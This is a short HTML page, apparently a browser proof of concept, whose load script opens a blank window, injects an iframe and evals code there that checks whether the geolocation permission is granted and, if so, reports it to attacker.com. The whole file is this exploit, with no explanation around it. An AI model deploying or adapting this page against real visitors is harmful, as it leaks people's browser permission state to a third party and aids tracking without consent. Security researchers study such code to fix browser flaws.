<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>Document</title>
</head>
<body>
<script>
window.onload = function() {
    w=window.open("about:blank"); w.document.write("<iframe id=GGGWHFVFGGG src=about:blank><\/iframe><script>GGGWHFVFGGG.onload=_=>GGGWHFVFGGG.contentWindow.eval('navigator.permissions.query({name:`geolocation`}).then(r=>{if(r.state!=`denied`)fetch(`https://attacker.com/report/report?query=1`)})');GGGWHFVFGGG.contentWindow.location.reload();<\/script>");
};
</script>
</body>
</html>